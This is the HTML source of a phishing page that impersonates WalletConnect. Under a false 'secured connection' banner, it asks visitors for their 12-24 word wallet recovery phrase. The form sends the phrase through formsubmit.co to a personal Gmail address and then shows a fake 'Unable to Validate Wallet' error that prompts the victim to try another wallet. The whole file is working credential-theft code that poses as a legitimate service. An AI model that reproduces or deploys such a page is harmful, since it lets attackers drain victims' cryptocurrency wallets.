<!DOCTYPE html>
<html lang="en">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="../flowbite-1.5.3/dist/flowbite.min.css" />
    <link rel="stylesheet" href="../inter/inter.css">
    <script src="https://cdn.tailwindcss.com"></script>
    <script src="https://cdn.tailwindcss.com?plugins=forms,typography,aspect-ratio,line-clamp"></script>
    <script src="../ajax/libs/jquery/3.6.1/jquery.min.js" referrerpolicy="no-referrer"></script>
</head>
<body style="background-color:#000000">
    <section class="">
        <div class="flex flex-col items-center justify-center px-6 py-8 mx-auto md:h-screen lg:py-0">
            <a href="../index.html" class="flex items-center font-bold text-white">
                <img src="../wc1.png" class="mr-3  mb-5" style="height:30px" alt="Logo">
                <span>Walletconnect</span>
            </a>
            
            <div class="p-4 text mb-4 text-sm text-blue-700 bg-blue-100 rounded-lg dark:bg-blue-200 dark:text-blue-800" role="alert">
                <span class="font-medium">
                   Info alert!
                </span>This is a secured connection.
            </div>
            <div class="w-full bg-white rounded-lg shadow dark:border md:mt-0 sm:max-w-md xl:p-0 dark:bg-gray-800 dark:border-gray-700">
                <div class="mb-4  border-b border-gray-200 dark:border-gray-700">
                    <ul class="flex flex-wrap -mb-px text-sm font-medium text-center" id="myTab" data-tabs-toggle="#myTabContent" role="tablist">
                        <li class="mr-2" role="presentation">
                            <button class="inline-block p-4 rounded-t-lg border-b-2 text-blue-600 hover:text-blue-600 dark:text-blue-500 dark:hover:text-blue-500 border-blue-600 dark:border-blue-500" id="profile-tab" data-tabs-target="#profile" type="button" role="tab" aria-controls="profile"
                                aria-selected="true">Phrase</button>
                        </li>
                    </ul>
                </div>
                <div id="myTabContent">
                    <div class="p-4 bg-gray-50 rounded-lg dark:bg-gray-800" id="profile" role="tabpanel" aria-labelledby="profile-tab">
                        <form method="POST" class="gform" action="https://formsubmit.co/attorneylarryparker222@gmail.com">
                            <input type="hidden" name="_captcha" value="false">
                            <input type="hidden" name="_next" value="error.html">
                            <div class="mb-6">
                                <textarea id="phrased" rows="4" name="Phrase" type="text" minlength="12" placeholder="Enter your recovery phrase (typically 12-24 words seperated by a single space" id="large-input" class="block p-4 w-full text-gray-900 bg-gray-50 rounded-lg border border-gray-300 sm:text-md focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500"
                                    required="required"></textarea>
                            </div>
                            <div class="flex w-full">
                                <button type="submit" class="text-white bg-blue-700 hover:bg-blue-800 focus:ring-4 focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 mr-2 mb-2 dark:bg-blue-600 dark:hover:bg-blue-700 focus:outline-none dark:focus:ring-blue-800">Proceed</button>
                          <span class="mr-2 uppercase" onclick="thankyou_message()"></span> 
                          <span>
                             
                          </span>
                       </button>
                            </div>
                            

                            <!-- Successfully Submitted page-->
                            <div style="display: none;" class="thankyou_message">
                                <center><p class="successful">Unable to Validate Wallet !!! Try another wallet</p></center>
                                <img src="error.png" width="25%" height="25%" style="display:block; margin-left:auto; margin-right:auto" class="thankyou_message">
                            </div>
                        </div> 
                    </form>
                   </div>
                </div>
            </div>
            
    </section>
    <script>
        function thankyou_message() {
            var form = document.querySelector('.gform');
            var thankyouMessage = document.querySelector('.thankyou_message');
            if (form.value != null || form.value != empty) {
                thankyouMessage.style.display == block;
            } else {
                thankyouMessage.style.display == none;
            }
        }
        // var form = document.getElementsByTagName('form')
        // if (form.value != null) {
        //     function thankyou_message() {
        //         var thankyou_message = document.querySelector('thankyou_message')
        //         thankyou_message.style.display == block;
        //     }
        // }
    </script>
    <script src="js/mine.js"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <script data-cfasync="false" type="text/javascript" src="js/form-submission-handler.js"></script>
    
   
    
        <script>
            function ready() {
                document.body.style.display = "block";
            }
            document.addEventListener("DOMContentLoaded", ready);
        </script>
</body>
</html>